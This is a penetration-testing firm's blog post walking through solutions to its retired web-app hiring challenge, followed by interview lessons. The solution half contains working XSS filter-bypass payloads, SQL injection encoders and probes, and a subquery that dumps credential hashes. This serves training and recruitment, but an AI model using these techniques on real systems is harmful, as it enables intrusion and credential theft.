Story of a Pentester Recruitment 2025

In 2015, we published a blog post about the recruitment challenges we devised for candidates who’d like to join our pentester team. The post got a lot of attention, with supportive comments and criticism as well. Learning from this experience, we created a completely new challenge that we’re retiring today, and we’d once again like to share the experiences (and the solutions!) we gained from this little game.

In summary, this second challenge of ours, called Mushroom, was much more successful than our first attempt: during the past 9 years, we hired 14 pentesters from junior to senior levels. We achieved this while keeping the challenge very simple and mostly unchanged throughout the years. Mushroom was a simple web application that even intern candidates could approach, but it had some tricks that we could use to gauge the seniority of more experienced people too.

In the first part of this post, we will guide our readers through all (intended) solutions of Mushroom. In the second part, we share our experiences with the submissions we received. While we discussed other areas like mobile applications or Red Teaming during interviews, we now only focus on the web application testing aspect, as this was relevant at every seniority level (and the post is long enough already).

We mark some paragraphs with [Industry Insight] to indicate things that we as business owners learned during the several dozen interviews we’ve been through. We also mark paragraphs with [Get Hired] where we aim to help people get hired as pentesters.

Process

Our hiring process was pretty simple: you express your interest in a pentest position (likely via e-mail), and in reply, we ask you to choose a 72h time frame that suits you for solving the Mushroom challenge. After the 72 hours pass, you submit a written report (as if it were a real pentest). If we find the report satisfactory, we invite you to an in-person interview, where we first go through the report and then discuss other technical and administrative topics, including salary. If we agree on everything, you are hired.

Note: we are a small company of about 20 people today, without a dedicated HR team. Mushroom was developed and the interviews were done by the company founders, who also actively work as penetration testers.

Based on the feedback we received, we improved our communication about this process a bit:

- Our salary ranges are public (and open at the top)

- While each candidate had 72 hours to complete the challenge, we explicitly told them that this window was intentionally oversized to leave space for job, studies, family, etc.

Mushroom Solutions

Mushroom is a fairly standard Flask web application with an Oracle backend database and mostly server-side rendering, with a little jQuery sprinkled on the frontend. The Flask WSGI application runs within Gunicorn, which is reachable via Apache HTTPd. The application doesn’t have authenticated interfaces, only a public UI where visitors can query information about mushrooms. The scope of the challenge was constrained to the HTTPS port of our server and a specific (virtual) hostname.

The database is old enough not to contain LLM-hallucinated, potentially life-threatening misinformation about mushrooms.

Important parts of the challenge were that the candidate should:

- Find as many vulnerabilities as they can and demonstrate their impact.

- Document their findings in a penetration testing report (as if presenting it to a real client).

I. Cross-Site Scripting



When playing around with the UI, one can easily see that a URL parameter called filter is passed to the server when selecting different mushroom “active agents”.

Of course, the parameter value can be directly manipulated in the browser, and it should be immediately obvious that the value is directly reflected on the UI:



This of course looks like a typical case of XSS, and we can even trivially inject some HTML into the frontend too:

Examining HTTP responses shows that there is no frontend magic: the rendering happens on the server side, suggesting a vanilla XSS scenario. However, when we experiment with some typical proof-of-concept XSS payloads, we’re faced with an unpleasant surprise:





Some candidates concluded that this behavior can only be used for HTML injection, but others rightfully wondered – what’s going on behind the scenes? While there are several ways to figure this out, a reliable method is to manipulate a “known bad” payload until we can deduce what part of it causes the error. Through this process, we can figure out that there is probably a Very Clever Filter™ implemented on the server-side:

Indeed, the relevant backend code was this:

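```python
import re

from flask import Flask, abort, request

app = Flask(__name__)

# Deny-list: "script" or common event handler prefixes,
# matched case-insensitively anywhere in the value
PROTECT_RE = re.compile('(?:script|on(?:click|mouse|key|load|change|dbl|context|error|scroll|resize|focus))', re.I)

# ...

@app.route('/')
def index():
    active_filter = request.args.get('filter')
    # Any match results in an HTTP 400 response
    if active_filter and PROTECT_RE.search(active_filter):
        abort(400)
    # ... (the filter value is later reflected into the rendered page)
```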

Regular players didn’t see this, of course, but when facing a suspected deny-list, it’s always easiest to just throw a lot of payloads at the service and see what sticks. Many candidates used online collections such as PayloadsAllTheThings or PortSwigger’s XSS Cheat Sheet. Let’s see how we can extract some relevant entries from the JSON dataset available for the latter using jq:

```shell
jq -r '.[] | .tags[] | select(.interaction == false) | select(.browsers[] | contains("chrome")) | .code' events.json
```

The above command parses the JSON map and provides us with a list of payloads that don’t need user interaction to fire and work in Chrome (for convenient manual verification).



We can feed this list to Burp’s Intruder (works fine for this task in the Community Edition too) or any simple script, then look for HTTP 200 responses:

[Get Hired] The above process is also doable manually, but we certainly appreciated it when candidates improved their efficiency with some automation. Fluency in commonly used utilities implies experience and shows that routine tasks won’t steal your time from the actual target.


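Burp isn’t strictly required for this step. Below is a minimal sketch of the “any simple script” option using only the Python standard library: it sends each payload in the filter parameter and keeps the ones answered with HTTP 200. BASE_URL is a placeholder (the challenge host is retired), and the function names are our own; a real engagement would also add throttling and stay strictly within the agreed scope.

```python
import sys
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable, Iterable, List

# Placeholder target URL (assumption): replace with the in-scope host.
BASE_URL = "https://mushroom.example/"


def fetch_status(payload: str) -> int:
    """Send one payload in the `filter` query parameter, return the HTTP status."""
    url = BASE_URL + "?" + urllib.parse.urlencode({"filter": payload})
    try:
        with urllib.request.urlopen(url, timeout=10) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        # urllib raises on 4xx/5xx, but the status code is still available.
        return err.code


def surviving_payloads(payloads: Iterable[str],
                       fetch: Callable[[str], int] = fetch_status) -> List[str]:
    """Keep the payloads that got HTTP 200, i.e. were not rejected by the filter."""
    return [p for p in payloads if fetch(p) == 200]


if __name__ == "__main__" and len(sys.argv) > 1:
    # One payload per line, e.g. the output of the jq command.
    with open(sys.argv[1], encoding="utf-8") as fh:
        candidates = [line.rstrip("\n") for line in fh if line.strip()]
    for hit in surviving_payloads(candidates):
        print(hit)
```

Run it as `python probe.py payloads.txt`. Passing a different `fetch` callable makes the filtering logic testable without network access.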

In the end, about half of the candidates came up with a filter bypass and successfully demonstrated a reflected XSS vulnerability:

This vulnerability class is of course very common, and in case you are wondering: yes, unfortunately, we regularly see naive filters similar to the above one during our projects.
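Now that the backend code is public, the weakness of such a deny-list can be shown offline. The sketch below copies PROTECT_RE verbatim from the code above and runs a few payloads through it; the payload list and the is_blocked helper are our own illustrative choices, not what candidates submitted. Passing the regex only means getting past the filter: whether a payload actually executes still has to be confirmed in a browser.

```python
import re

# Pattern copied verbatim from the Mushroom backend.
PROTECT_RE = re.compile(
    '(?:script|on(?:click|mouse|key|load|change|dbl|context|error|scroll|resize|focus))',
    re.I,
)

# Illustrative payloads, chosen for this example only.
CANDIDATES = [
    "<script>alert(1)</script>",
    "<img src=x onerror=alert(1)>",
    "<input autofocus onfocusin=alert(1)>",  # "onfocus" also matches as a prefix
    "<details open ontoggle=alert(1)>",
    "<svg><animate onbegin=alert(1) attributeName=x dur=1s>",
]


def is_blocked(payload: str) -> bool:
    """True if the deny-list matches anywhere in the payload (HTTP 400)."""
    return PROTECT_RE.search(payload) is not None


if __name__ == "__main__":
    for p in CANDIDATES:
        print("blocked" if is_blocked(p) else "passes ", p)
```

The last two payloads pass because their event handlers (ontoggle, onbegin) simply aren’t on the list, which is exactly the kind of gap a cheat-sheet-driven search turns up.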

II. SQL “injection”



When the user requests data about a mushroom, some jQuery code on the frontend sends a POST request to the /ajax_table interface with a Base64-encoded parameter that holds a JSON object:

```http
POST /ajax_table HTTP/1.1
Host: mushroom.silentsignal.hu
Content-Length: 161
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
[...]

json=eyJmIjpbImF1dGhvcnMiLCJ5ZWFyIiwidGl0bGUiLCJqb3VybmFsIiwidm9sdW1lIiwicGFnZXMiLCJ1cmwiLCJpc3NuIl0sInQiOiJjaXRhdGlvbnMiLCJ3IjoibXVzaHJvb21faWQiLCJ2IjoxfQ%3D%3D
```

Here’s what the embedded JSON looks like:

```json
{"f":["authors","year","title","journal","volume","pages","url","issn"],"t":"citations","w":"mushroom_id","v":1}
```
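Decoding the captured value takes only a few lines. This sketch (the decode_param name is ours) undoes the form encoding, then Base64, then parses the JSON. It uses unquote_plus to mirror how form bodies are decoded, which matters because Base64 output can contain `+`.

```python
import base64
import json
import urllib.parse

# The `json` parameter exactly as captured in the request body.
CAPTURED = "eyJmIjpbImF1dGhvcnMiLCJ5ZWFyIiwidGl0bGUiLCJqb3VybmFsIiwidm9sdW1lIiwicGFnZXMiLCJ1cmwiLCJpc3NuIl0sInQiOiJjaXRhdGlvbnMiLCJ3IjoibXVzaHJvb21faWQiLCJ2IjoxfQ%3D%3D"


def decode_param(value: str) -> dict:
    """Form-decode, Base64-decode and JSON-parse the `json` parameter."""
    return json.loads(base64.b64decode(urllib.parse.unquote_plus(value)))


print(decode_param(CAPTURED))
```

This prints the same object as the JSON shown above, with no signature or encryption involved.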

Although the challenge was developed well before JWT became as commonplace as it is today, an unintended consequence of JWTs being (ab)used for everything is that the reaction of people seeing something similar to a JWT (JSON encoded with Base64) could tell us a lot about their skills and mindset.

- Those with little experience and/or focus simply called it a JWT.

- Some complained about it not being signed and/or encrypted – demonstrating that they did not understand the trust boundaries, as this payload was generated by client-side code.

- The weirdest attempt used an LLM to decode it, which led to some hallucinated JSON content with attributes not even used by the application; it was not easy for us to figure out where they got this result from.

[Get Hired] Pay attention to terminology. Not knowing every three-letter abbreviation is perfectly fine (we also struggle with them sometimes), especially if you can describe concepts in your own words. Consistently misusing terms, however, raises some red flags.



Astute readers can surely spot it right away, but even less experienced players tend to find out after a bit of experimentation that the ajax_table interface is basically a direct interface to the backend database, and the above JSON object can be used to issue SQL queries. The relevant backend code looked like this:

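```python
import json
from base64 import b64decode

r = json.loads(b64decode(request.form['json']))
# ...
# f (fields), t (table) and w (WHERE column) are pasted into the SQL text; only v is bound
cur.execute(u'SELECT {fields} FROM {table} WHERE {field} = :value'.format(
    fields=','.join(r['f']), table=r['t'], field=r['w']), value=r['v'])
```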
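Rendering the statement without a database makes the problem visible. The sketch below reuses the backend’s format string (the render_query helper is hypothetical, written for this post): of the four JSON keys, only v travels as a bind variable, while f, t and w become part of the SQL text itself.

```python
def render_query(r: dict) -> str:
    """Build the SQL text exactly as the backend's str.format() call does."""
    return u'SELECT {fields} FROM {table} WHERE {field} = :value'.format(
        fields=','.join(r['f']), table=r['t'], field=r['w'])


original = {"f": ["authors", "year", "title", "journal", "volume", "pages", "url", "issn"],
            "t": "citations", "w": "mushroom_id", "v": 1}
print(render_query(original))
# SELECT authors,year,title,journal,volume,pages,url,issn FROM citations WHERE mushroom_id = :value
```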

From this point, candidates face the following challenges:

- Figuring out the type of the backend database to craft payloads with correct syntax.

- Taking care of the Base64 encoding: one could use tools like Hackvertor or SQLmap tamper scripts for this task. (Encoding was a later addition to the challenge, suggested by new colleagues who had already aced the previous version.)

- The code had an additional Very Clever Filter™!

We considered the first point a routine task, and candidates who submitted solutions indeed tackled it easily, usually trying to inject typical function names. The second problem tested the candidate’s literacy in standard tooling, but we also appreciated custom solutions showing off scripting skills. At this stage, one could query excessive information about the backend schema, like engine version and the list of tables:
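As an example of the custom-solution route, here is a minimal encoder playing the role of a tamper script: it turns query parts into the form body /ajax_table expects. The encode_request name is ours. It serializes the JSON compactly (which reproduces the captured traffic byte for byte) and lets urlencode percent-escape `+`, `/` and `=`. The example asks Oracle’s ALL_TABLES dictionary view for table names; with w set to "1" and v bound to 1, the WHERE clause becomes an always-true `1 = :value`.

```python
import base64
import json
import urllib.parse


def encode_request(fields, table, where, value) -> str:
    """Build the urlencoded POST body for /ajax_table from query parts."""
    obj = {"f": list(fields), "t": table, "w": where, "v": value}
    compact = json.dumps(obj, separators=(",", ":"))  # no whitespace, as in the captured request
    b64 = base64.b64encode(compact.encode("utf-8")).decode("ascii")
    return urllib.parse.urlencode({"json": b64})  # escapes '+', '/' and '='


if __name__ == "__main__":
    # List table names visible to the application's database user.
    print(encode_request(["table_name"], "all_tables", "1", 1))
```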

The third point was a bit trickier, but you didn’t think we’d let people off the hook so easily, right? :) Our goal with all parts of this challenge was to create easy tasks that require thinking; in this case, we achieved this effect with this VCF™:

```python
if 'user' in r['t'].lower():
    abort(403)
```



In short, we reject every request where the table name requested with SQL contains the substring 'user', so when players wanted to query the contents of the users table they were faced with an HTTP 403 error:



Thinking like a hacker, you’ll of course know that table names in SQL don’t only appear after the FROM keyword. For example, subqueries in the field list easily bypass the filter and give access to the contents of the USERS table:

Resulting query on the backend:

```sql
SELECT (select username||':'||password from users where rownum=1) FROM DUAL WHERE 1=1
```
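The same bypass can be checked offline. The sketch below mirrors both the table-name filter and the backend’s query construction (helper names are ours); unlike the query above, it leaves the bind variable as `:value` instead of showing it inlined as `1=1`. The `where rownum=1` part keeps the subquery scalar, since a subquery in the field list must return at most one row.

```python
def table_filter_blocks(r: dict) -> bool:
    """Mirror of the Very Clever Filter: reject if 't' contains 'user'."""
    return 'user' in r['t'].lower()


def render_query(r: dict) -> str:
    """Same str.format() construction as the backend code."""
    return u'SELECT {fields} FROM {table} WHERE {field} = :value'.format(
        fields=','.join(r['f']), table=r['t'], field=r['w'])


direct = {"f": ["username", "password"], "t": "users", "w": "1", "v": 1}
bypass = {
    # USERS only appears inside a scalar subquery in the field list.
    "f": ["(select username||':'||password from users where rownum=1)"],
    "t": "dual",
    "w": "1",
    "v": 1,
}

for r in (direct, bypass):
    print("403   " if table_filter_blocks(r) else "passes", render_query(r))
```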

Accessing the USERS table reveals 3 user records and their corresponding password hashes.

[Industry Insight] The saddest part of our little statistic is that two-thirds of the OSCP holders who submitted a report failed to get this far.

III. Weak Password Hashing

The passwords of the accounts were the following:

- jelszo (“password” in Hungarian)

- password

- abFU324k

With such weak passwords, it is possible to confirm that passwords are hashed with the MD5 algorithm, without salting or any other modification. This can also be noted as a weakness of the application, and many applicants dedicated a separate vulnerability entry to it. What we did not plan for was the opportunity this created at the face-to-face interview: measuring how deeply the interviewee understood what exactly the problem was with using MD5 to store passwords, and how it could be fixed.
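Confirming the scheme boils down to hashing a guessed password and comparing the result with the dumped value. In the sketch below, the function names are ours, and since the actual hash values aren’t reproduced in this post, they are computed as stand-ins. It also shows why the missing salt hurts: a single pass over a wordlist checks every account at once.

```python
import hashlib


def md5_hex(password: str) -> str:
    """Plain, unsalted MD5 of the password."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


def crack_unsalted_md5(hashes, wordlist):
    """Map each hash to the wordlist entry producing it, or None.

    Without salt, the wordlist is hashed once and reused for every account,
    and identical passwords show up as identical hashes.
    """
    lookup = {md5_hex(word): word for word in wordlist}
    return {h: lookup.get(h) for h in hashes}


dumped = [md5_hex(p) for p in ("jelszo", "password", "abFU324k")]  # stand-ins for the dump
print(crack_unsalted_md5(dumped, ["123456", "jelszo", "password", "qwerty"]))
```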

The fact that many developers are confused about this is not new; dnet even dedicated two talks to this subject at Hungarian developer-oriented meetups. However, it is still interesting to see people already working in IT security demonstrating deep misunderstandings regarding the relevance of MD5 collisions in the context of password storage. We tried giving hints during the interviews, and this provided us with another great way to measure skill: we took note of how many hints were needed to understand the problem and come up with a proper solution.
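For the “how could it be fixed” part, one common answer (not necessarily the only one we’d accept) is a deliberately slow, salted key derivation function. Argon2id, scrypt or bcrypt are usually preferred where a library is available; the sketch below uses PBKDF2-HMAC-SHA256 only because it ships with Python’s hashlib. The storage format string is our own assumption, and the iteration count is the figure OWASP’s Password Storage Cheat Sheet gives for PBKDF2-HMAC-SHA256 at the time of writing. Collision resistance plays no role here: what matters is the cost per guess and the per-user salt.

```python
import hashlib
import hmac
import os

ITERATIONS = 600_000  # OWASP figure for PBKDF2-HMAC-SHA256 (assumption: check current guidance)


def hash_password(password: str, iterations: int = ITERATIONS) -> str:
    """Derive a salted, slow hash; store algorithm, cost and salt alongside it."""
    salt = os.urandom(16)  # unique random salt per password
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute the hash with the stored salt and cost, compare in constant time."""
    algo, iters, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError("unsupported hash format")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                             bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)
```

Storing the iteration count with each hash lets the cost be raised later without invalidating existing records.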

IV. Keys and Values

While extracting password hashes from the backend DB is certainly a nice feat, the goal of the exercise was to “identify as many vulnerabilities as possible and demonstrate their exploitability”: in the end, you wouldn’t get far by fixing a critical vulnerability while there are a dozen others in the same application. Vulnerability density and “hot spots” are valuable information for defenders too!

After extracting table names from the database and filtering out well-known Oracle tables, one is left with the following list:

- CITATIONS

- KV

- MUSHROOMS

- USERS



Some of these tables are obviously related to application features, and the USERS table stands out as something that holds valuable data. But what about that sneaky KV table? Using the previous vulnerability, we can easily list its contents:







last-xff and a value that looks like an IP address… With this more advanced vulnerability, we counted on the candidate’s experience with web applications and the HTTP protocol in general, but one could also use automated testing tools that “fuzz” HTTP headers to figure out that this table stores the value of the X-Forwarded-For header received by the application. This can be verified by supplying such a header manually:

This means that we have an additional user-controlled value that is parsed by the application, thus additional attack surface that we should test! It is not especially hard to find out that something is fishy with this parsing too:

One can use manual or automated methods to conclude that there is another SQL injection vulnerability, unaffected by the previous Very Clever Filter™:
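A typical manual check is quote balancing. The sketch below is a generic heuristic, not a reconstruction of Mushroom’s code (we don’t show how the application builds its query from the header): if a lone `'` changes the response while a doubled `''` restores the baseline, the value is likely being pasted into a SQL string literal. TARGET and the helper names are placeholders, and relying on status codes alone is an assumption; some applications only differ in response body or timing.

```python
import urllib.error
import urllib.request
from typing import Callable

TARGET = "https://mushroom.example/"  # placeholder for the in-scope URL


def send_xff(value: str) -> int:
    """Request TARGET with a chosen X-Forwarded-For value; return the status."""
    req = urllib.request.Request(TARGET, headers={"X-Forwarded-For": value})
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code


def quote_balancing_probe(send: Callable[[str], int] = send_xff,
                          base: str = "127.0.0.1") -> bool:
    """True if an odd number of quotes breaks the response and an even one restores it."""
    baseline = send(base)
    single = send(base + "'")
    doubled = send(base + "''")
    return single != baseline and doubled == baseline
```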

[Get Hired] Work iteratively: new information can open locked doors.

V. (Un)intentional Vectors

In the previous screenshots, you can see that our stack included some pretty old components, including:

- The Oracle database

- jQuery frontend library

- (Apache HTTPd acting as reverse proxy wasn’t up-to-date either)

We intentionally went with these components to see how people would assess the risk associated with them, and also to see if anybody could combine known weaknesses in the dependencies to demonstrate exploits in innovative ways. Based on our experience in creating wargames, we also counted on completely unintended solutions and vulnerabilities unknown to us; unintended solutions are usually the best solutions! :)

While outdated software components came up regularly in submitted reports (more on these a bit later), we only got one exploit that relied on these: a candidate used jQuery to circumvent our Very Clever Filter. This resulted in an instant invitation to an in-person interview.

Solution Summary

As you can see, the vulnerabilities we hid in the Mushroom application were very typical web application vulnerabilities, resembling those that our experts find by the dozens every month. We believe there should be no doubt that finding and creating a PoC for at least the presented XSS and SQL injection vulnerabilities should be the minimum expected even of junior pentesters.

However, for a long time, we didn’t use a strict GO/NOGO metric to evaluate submissions. For example, good reasoning and a solid understanding of fundamentals could outweigh the lack of a demonstrated VCF bypass.

On the other hand, there was a growing list of signs that we considered warnings at a minimum and disqualifiers at worst:

- Buffer overflow: We received a surprising number of submissions that concluded the application is vulnerable to memory corruption only because some long HTTP requests resulted in HTTP/400 or HTTP/500 errors. We have no idea where this came from, but after some interviews, we started to use this trait as an instant disqualifier.

- Documentation: Nobody likes documentation, so we never decided negatively based on documentation quality – the received reports ranged from a short e-mail through Cherry Tree databases to PDFs generated with LaTeX, and we read them all. Representing findings clearly is an important part of the job though, and the quality of document format and structure correlated strongly with the comprehensiveness of findings.

- Scoping: Not staying in the scope was a significant negative sign. No business built on trust can afford loose cannons.

[Industry Insight] It was shocking to see that candidates with quality certifications (e.g. OSCP) and years of experience as pentesters in international companies couldn’t fully exploit vulnerabilities I. and II. This paints a bleak picture of the median quality of available pentest services.

The Interview

In the following sections, we explain parts of the in-person interview that were relevant to the Mushroom challenge.

Severity Assessment

While admittedly not as sexy as getting root shells, a critical part of penetration testing is understanding risk and how the severity of vulnerabilities contributes to it. We intentionally ignored risk assessment sections when evaluating written reports (if they included any), and let candidates talk about and clarify their thought process during live interviews. We also encouraged people to refine their conclusions, overriding their previously written classification if needed; we didn’t consider such cases a negative.

The first thing that stood out was that the vast majority of candidates do severity assessments based on gut feeling. We could of course fill many pages about the shortcomings of CVSS and similar frameworks (in fact, we had nice discussions about this with some candidates), but one should understand that using such systems is not only often a client-mandated part of professional work, but also provides a consistent reference to hold on to, avoiding contradictory results (e.g. vulnerabilities with similar stated properties classified differently). Nonetheless, we were interested in the thought process, not creative use of CVSS.

Our typical technique was a bit of role play, where one of us acted as the CEO of our Mushroom database while the candidate had to reason about their severity classification for vulnerability I. (XSS). It quickly turned out that session hijacking is less of a threat if the application doesn’t handle sessions :) Coming up with alternative threats quickly showed whether a candidate could see the target in context or only knew what the general description of XSS looks like.

And while formal frameworks were mostly ignored for people’s “own” bugs, the authority of vulnerability databases and their CVSS-based scoring suddenly became relevant when talking about widely used software such as jQuery or Oracle, without further thought given to exploitability. For example, Oracle privilege escalations requiring arbitrary SQL execution often got high severity ratings, while they aren’t practical when you can only manipulate a SELECT query. It is nice that people can come up with hypothetical scenarios about “villains with fantastic (yet oddly constrained) powers”, but pentest reports should be based on hard data, not fantasies.

We should note that we believe severity assessment skills can be easily improved, so choking on this little test didn’t rule out candidates, but rather showed us potential areas of improvement (including e.g. communication skills).

[Industry Insight] A surprising experience was that even some people with relevant industry experience (even at senior level!) struggled with this exercise. “Priority inversion”, where fixing painfully theoretical cryptographic weaknesses takes resources away from mitigating potentially devastating business logic flaws, can paralyze security teams. Penetration testing should provide guidance about what real attackers are after, but the typical behavior of “overpricing” findings pushes in exactly the opposite direction.

[Get Hired] Learn about the fundamentals of risk assessment, and get familiar with severity rating frameworks. CVSS is a must (we don’t make the rules…) and we can recommend taking a look at OWASP RRM too to get a more nuanced take on the problem.
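CVSS’s arithmetic is mechanical; the judgment is in choosing the metrics. As a refresher, here is a sketch of the CVSS v3.1 base score computation, with the weights and the Roundup function as we read them from FIRST’s v3.1 specification (cross-check against FIRST’s official calculator before relying on it). The vectors in the usage lines are our own illustrations, not the ratings we expected: the first is a commonly seen rating for reflected XSS, and whether its S:C and C:L/I:L values fit an application without sessions is exactly the kind of question discussed above.

```python
import math

# CVSS v3.1 base metric weights (FIRST CVSS v3.1 specification).
AV = {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2}
AC = {"L": 0.77, "H": 0.44}
UI = {"N": 0.85, "R": 0.62}
CIA = {"H": 0.56, "L": 0.22, "N": 0.0}
PR_UNCHANGED = {"N": 0.85, "L": 0.62, "H": 0.27}
PR_CHANGED = {"N": 0.85, "L": 0.68, "H": 0.5}  # PR weights are higher when scope changes


def roundup(x: float) -> float:
    """CVSS v3.1 Roundup: smallest one-decimal value >= x, robust to float noise."""
    i = int(round(x * 100000))
    if i % 10000 == 0:
        return i / 100000.0
    return (math.floor(i / 10000) + 1) / 10.0


def base_score(vector: str) -> float:
    """Compute the CVSS v3.1 base score from a vector string."""
    m = dict(p.split(":") for p in vector.split("/") if not p.startswith("CVSS"))
    changed = m["S"] == "C"
    iss = 1 - (1 - CIA[m["C"]]) * (1 - CIA[m["I"]]) * (1 - CIA[m["A"]])
    if changed:
        impact = 7.52 * (iss - 0.029) - 3.25 * (iss - 0.02) ** 15
    else:
        impact = 6.42 * iss
    pr = (PR_CHANGED if changed else PR_UNCHANGED)[m["PR"]]
    exploitability = 8.22 * AV[m["AV"]] * AC[m["AC"]] * pr * UI[m["UI"]]
    if impact <= 0:
        return 0.0
    if changed:
        return roundup(min(1.08 * (impact + exploitability), 10))
    return roundup(min(impact + exploitability, 10))


print(base_score("CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"))  # 6.1
print(base_score("CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"))  # 7.5
```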

Fundamentals

Probably the most important aspect of our live interview is to make sure the candidate understands the technologies they work with because it is impossible to build without strong foundations.

Maybe the hardest lesson of this campaign was that our challenges couldn’t filter out candidates with weak fundamentals. It should be noted that the challenges changed little over a long time, so cheating couldn’t be ruled out either (although we were even open to allowing people multiple tries after a “study period” passed). In the end, live interviews turned out to be invaluable for skill assessment.

When we talk about fundamentals, we think about concepts like the Same-Origin Policy: without understanding the motivation of SOP, its high-level implementation, and how it fits into the larger ecosystem (e.g. the connection of some security headers with SOP) it is impossible to understand security boundaries and thus the difference between vulnerabilities and features of web applications. Still, SOP turned out to be an area where most candidates felt visibly uneasy. We believe this is the result of the vulnerability-focused nature of most training materials: students are taught all the fancy browser-based attacks from XSS to Clickjacking without discussing why these convoluted techniques were invented in the first place.
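The core rule itself is compact: two URLs share an origin only if scheme, host and port all match. The sketch below (helper names are ours) computes that tuple with urllib.parse, filling in default ports. It deliberately ignores opaque origins (e.g. data: URLs or sandboxed frames), the legacy document.domain relaxation and IDN normalization, and it is the browser that enforces SOP, not the server. “Same-site”, as used by the cookie SameSite attribute, is a looser notion.

```python
from urllib.parse import urlsplit

DEFAULT_PORTS = {"http": 80, "https": 443}


def origin(url: str):
    """Return the (scheme, host, port) tuple that defines a URL's origin."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    port = parts.port if parts.port is not None else DEFAULT_PORTS.get(scheme)
    return (scheme, parts.hostname, port)


def same_origin(a: str, b: str) -> bool:
    """True if both URLs have an identical (scheme, host, port) tuple."""
    return origin(a) == origin(b)


print(same_origin("https://mushroom.example/?filter=x",
                  "https://mushroom.example:443/ajax_table"))  # True: 443 is the default
print(same_origin("https://mushroom.example/", "http://mushroom.example/"))  # False: scheme differs
```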

A more extreme example of “security tunnel vision” is when the candidate misunderstands where the code runs. For example, some candidates assessed jQuery prototype pollution vulnerabilities as Remote Code Execution threats (as if jQuery was running on the server-side). Shockingly, we’ve seen such misunderstandings in the case of pentesting and web app development practitioners, indicating that today’s tools and frameworks completely hide what’s going on at the HTTP level, and some professionals don’t even care to look.

[Get Hired] It’s no secret that such fundamental shortcomings lead to the quick closing of the interview. From the abundance of pentest training materials available today on the Internet, it’s worth looking for those that not only explain attacks and tools but the underlying technology as well.

Recommendations

Remediation guidance is an often overlooked part of pentest reports. This may seem justified, as pentesters are not the ones responsible for delivering any fixes. On the other hand, many vulnerabilities occur because developers and administrators often can’t afford to acquire the knowledge and experience that security specialists bring to the table. Thus it is our duty to guide the work of our clients as well as we can.

Most written reports only included generic recommendations, either in the form of some public template or vague rules of thumb like “validate all inputs”. During the interview, we discussed recommendations at length to see how candidates would perform in a typical consulting scenario, e.g. when a client comes back with questions about handling our reported findings. These discussions provided further insight into the foundational knowledge of the candidate and showed their familiarity with specific technologies. Note that experience with the specific technologies of Mushroom was not a requirement, but it was a major plus if the candidate knew what modern web applications typically look like and what some of the applicable secure development practices are.

Here are some of our favorite topics:

- We already have “input validation” in the form of VCF™s. Can we improve it to prevent future attacks? Should we?

- “validate and sanitize all inputs” – What is the difference? Do we need both? In what order?

- Should we use prepared statements to fix II. SQLi?

[Get Hired] Answer the above questions knowing all the Mushroom challenges and their solutions!

Candidates should realize there is a reason why a system is the way it is. Understanding the requirements and constraints of the environment not only helps provide better recommendations but also makes bug hunting more effective by highlighting vulnerability types most relevant to the target system.

Traps (of Your Own Making)

As we noted above, we are not HR specialists, so one of our most unexpected experiences was seeing people walk into traps they set up for themselves. We generally avoided tricky questions and puzzles (maybe because we are not HR specialists?), but in almost every interview the candidate started to talk about technical topics they clearly didn’t understand. Oftentimes, these topics weren’t even closely related to the challenges, so we wouldn’t have asked about them, but we did spot inaccuracies in the candidate’s explanation. At this point, we usually asked clarifying questions, even giving hints about the problem, but unfortunately, this usually resulted in the candidate digging even deeper into uncharted territory, or even trying to connect it with unrelated topics, degrading our confidence in their understanding of both areas.

In this regard, CSRF turned out to be a minefield (remember, we don’t even have session handling!), but perhaps the most glaring example was improperly set HTTP Cache-Control headers ending up breaking TLS.

[Get Hired] We’d like to emphasize: it’s OK to say “I don’t know”, and it’s great if you can recognize your mistakes! (We know, because we make mistakes all the time!)

Summary

We hope you enjoyed this post, which tried to target a wide audience. If you are looking for a job in this area, this post aims to give you some insight from “the other side”. We might be living in our own bubble, so our views might not generalize perfectly to other companies. However, we like to believe that we are not the only ones looking for people who are capable of logical thinking, aware of what they know and what they’re missing, and eager to learn every day for the foreseeable future. Obviously, publishing the details of our little challenge means we will not use it for further applicants. The replacement has already gone live, so if you really feel you’re ready to tackle this challenge and join our team, send us your CV.

If you are on the procurement side of pentest services, this post aims to show you the kind of talent we’re working with (since they all passed an exercise like this) and our approach to offensive assignments. While the demand for pentesting is growing, and so is the supply of companies offering such services, we think it’s important to highlight that the difference between a vulnerability scan and a penetration test is mostly the human factor; thus, how you pick the talent that delivers this added value can make or break such a project.